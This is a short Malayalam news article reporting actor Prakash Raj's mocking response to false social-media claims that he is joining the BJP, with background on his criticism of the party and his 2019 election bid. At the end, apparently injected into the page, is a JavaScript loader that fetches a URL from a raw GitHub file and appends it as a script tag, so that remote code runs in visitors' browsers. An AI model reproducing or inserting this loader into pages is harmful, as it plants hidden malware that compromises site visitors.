തമിഴ് നടൻ പ്രകാശ് രാജ് ബിജെപിയിൽ ചേരുന്നു എന്ന വ്യാജവാർത്തത സോഷ്യൽ മീഡിയകളിൽ പ്രചരിക്കുന്നതിനിടെ തന്റെ പ്രതികരണവുമായി രംഗത്തിരിക്കുകയാണ് താരം. തന്നെ വിലയ്ക്ക് എടുക്കാൻ കഴിയുന്നത്ര (ആശയ) സമ്പത്ത് ബിജെപിയുടെ കയ്യിൽ ഉണ്ടെന്നു കരുതുന്നില്ല എന്നാണ് അദ്ദേഹം പ്രതികരിച്ചത് ബിജെപിയെ കളിയാക്കി കൊണ്ടുള്ള ഇമോജികളും ഉൾപ്പെടുത്തിക്കൊണ്ടായിരുന്നു താരത്തിന്റെ പോസ്റ്റ് താരത്തിന്റെ പ്രതികരണം സോഷ്യൽ മീഡിയ ഒന്നടങ്കം ഏറ്റെടുത്തിട്ടുണ്ട്. ഭരണ കക്ഷിയായ ബിജെപിയുടെ രൂക്ഷവിമർശകനാണ് താരം. കഴിഞ്ഞ മാസം, ലഡാക്കിന് സംസ്ഥാന പദവി നൽകണമെന്നും ഭരണഘടനയുടെ ആറാം ഷെഡ്യൂളിൽ ഉൾപ്പെടുത്തണമെന്നും ആവശ്യപ്പെട്ട് നിരാഹാര സമരം നടത്തിയ കാലാവസ്ഥാ പ്രവർത്തക സോനം വാങ്ചുക്കിനെ അദ്ദേഹം കണ്ടു. സർക്കാരുകൾ തങ്ങളുടെ വാഗ്ദാനങ്ങൾ പാലിക്കാത്തപ്പോൾ, രാജ്യത്തെ ജനങ്ങൾക്ക് അവരുടെ ഭരണഘടനാപരമായ അവകാശങ്ങൾക്കു അനുസൃതമായി ഒന്നിച്ച് ശബ്ദമുയർത്തുകയല്ലാതെ മറ്റൊരു മാർഗവുമില്ലെന്ന് വാങ്ചുക്കുമായുള്ള കൂടിക്കാഴ്ചയ്ക്ക് ശേഷം രാജ് പറഞ്ഞു.ഹിമാചൽ പ്രദേശിലെ മാണ്ഡിയിൽ നിന്നുള്ള ബിജെപി സ്ഥാനാർത്ഥി നടി കങ്കണ റണാവത്ത്, സ്വാതന്ത്ര്യ സമര സേനാനി സുബാഷ് ചന്ദ്ര ബോസിനെ ഇന്ത്യയുടെ ആദ്യ പ്രധാനമന്ത്രി എന്ന് വിളിക്കുന്ന വീഡിയോയ്‌ക്കെതിരെയും താരം പ്രതികരിച്ചിരുന്നു. 2019 ലെ പൊതുതെരഞ്ഞെടുപ്പിൽ ബെംഗളൂരു സെൻട്രലിൽ നിന്ന് പ്രകാശ് രാജ് സ്വതന്ത്ര സ്ഥാനാർത്ഥിയായി മത്സരിച്ചെങ്കിലും പരാജയപ്പെട്ടു.പ്രധാനമന്ത്രി നരേന്ദ്ര മോദിയുടെ വിമർശകനായതുകൊണ്ടാണ് പല പാർട്ടികളും തനിക്കു പിന്നാലെയുള്ളതെന്നും അദ്ദേഹം പറഞ്ഞു. “എനിക്ക് കെണിയിൽ വീഴാൻ താൽപ്പര്യമില്ല,” നടൻ പറഞ്ഞു.
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)